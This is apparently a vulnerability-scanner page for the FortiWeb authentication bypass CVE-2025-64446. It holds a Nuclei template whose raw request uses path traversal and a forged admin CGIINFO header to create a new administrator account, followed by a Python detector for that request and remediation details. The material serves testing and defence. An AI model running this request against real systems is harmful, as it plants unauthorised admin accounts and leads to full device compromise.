FortiWeb - Authentication Bypass
CVE-2025-64446
Early Release
Description
A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
Severity
Critical
CVSS Score
9.8
Published Date
November 14, 2025
Template Author
dhiyaneshdk, watchtowr, rapid7
CVE-2025-64446.yaml
id: CVE-2025-64446

info:
  name: FortiWeb - Authentication Bypass
  author: DhiyaneshDk,watchTowr,rapid7,defusedcyber
  severity: critical
  description: |
    A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
  impact: |
    Attackers can execute administrative commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest FortiWeb version beyond 8.0.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    - https://x.com/defusedcyber/status/1975242250373517373
    - https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass
    - https://github.com/rapid7/metasploit-framework/pull/20698/files
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-64446
    cwe-id: CWE-23
    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"FortiWeb - "
  tags: cve,cve2025,vuln,fortiweb,fortigate,intrusive,auth-bypass

variables:
  username: "{{to_lower(rand_text_alpha(8))}}"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
        Host: {{Hostname}}
        CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
        Content-Type: application/json

        {
          "data": {
            "q_type": 1,
            "name": "{{username}}",
            "access-profile": "prof_admin",
            "access-profile_val": "0",
            "trusthostv4": "0.0.0.0/0",
            "trusthostv6": "::/0",
            "last-name": "",
            "first-name": "",
            "email-address": "",
            "phone-number": "",
            "mobile-number": "",
            "hidden": 0,
            "comments": "",
            "sz_dashboard": -1,
            "type": "local-user",
            "type_val": "0",
            "admin-usergrp_val": "0",
            "wildcard_val": "0",
            "accprofile-override_val": "0",
            "sshkey": "",
            "trusthostv4": "127.0.0.1/8",
            "trusthostv6": "::1/128",
            "passwd-set-time": 0,
            "history-password-pos": 0,
            "history-password0": "",
            "history-password1": "",
            "history-password2": "",
            "history-password3": "",
            "history-password4": "",
            "history-password5": "",
            "history-password6": "",
            "history-password7": "",
            "history-password8": "",
            "history-password9": "",
            "force-password-change": "disable",
            "force-password-change_val": "0",
            "password": "{{password}}"
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"results":'
          - '"can_clone":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"USERNAME: "+ username'
          - '"PASSWORD: "+ password'
# digest: 490a00463044022053bf526c1024e22493a08ede8c464007744022343f733383c2c498e2d99e3ad002203807da6b2e88b4e6ea38da017e4ed6326d090f1cc79e80d7eb6a74b5d045e6fe:922c64590222798bb761d5b6d8e72950
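As an added detection example (not part of the template or of the page's sources), the Python below inspects a raw HTTP request head for the two markers of the request this template sends: a percent-encoded path that, once decoded and normalized, climbs out of /api/ into /cgi-bin/fwbcgi, and a CGIINFO header that base64-encodes a JSON identity claim. The sample request heads and the host name fortiweb.example are constructed for the example.

```python
import base64
import json
from urllib.parse import unquote

# Constructed request heads, not captured traffic; the first follows the template's request shape.
SAMPLE_REQUESTS = [
    "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1\r\n"
    "Host: fortiweb.example\r\n"
    "CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==\r\n"
    "Content-Type: application/json\r\n",
    "GET /api/v2.0/cmdb/system/admin HTTP/1.1\r\nHost: fortiweb.example\r\n",  # benign call
]

def normalize_path(raw_path):
    # Percent-decode first, then collapse '.' and '..' like a lenient path join: '%3f'
    # keeps the router on /api/..., but decoded, the '..' segments climb to /cgi-bin/fwbcgi.
    stack = []
    for seg in unquote(raw_path.split("?", 1)[0]).split("/"):
        if seg == "..":
            stack = stack[:-1]
        elif seg not in ("", "."):
            stack.append(seg)
    return "/" + "/".join(stack)

def parse_request(raw):
    # Split a raw request head into (path, lower-cased header dict).
    lines = raw.split("\r\n")
    path = lines[0].split(" ", 2)[1]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return path, headers

def inspect_request(raw):
    # Return finding codes for one request head; an empty list means nothing seen.
    path, headers = parse_request(raw)
    findings = []
    # 1. '..' segments present and the decoded path lands on the fwbcgi handler.
    if ".." in unquote(path).split("/") and normalize_path(path) == "/cgi-bin/fwbcgi":
        findings.append("TRAVERSAL_TO_FWBCGI")
    # 2. A CGIINFO header carrying an identity claim: decode it so the alert names the
    #    account the request claims to be (the template's value claims admin).
    if "cgiinfo" in headers:
        try:
            claims = json.loads(base64.b64decode(headers["cgiinfo"], validate=True))
            findings.append("CGIINFO_ASSERTS:%s" % claims.get("username"))
        except ValueError:  # malformed base64 or non-JSON payload
            findings.append("CGIINFO_UNPARSEABLE")
    return findings
```

Because the check works on the decoded and normalized path rather than on the literal string, it also catches variants that use a different number of `..` segments or a different encoding of the `?`.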
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2025-64446
CWE ID:
CWE-23
Remediation Steps
Update to the latest FortiWeb version beyond 8.0.1.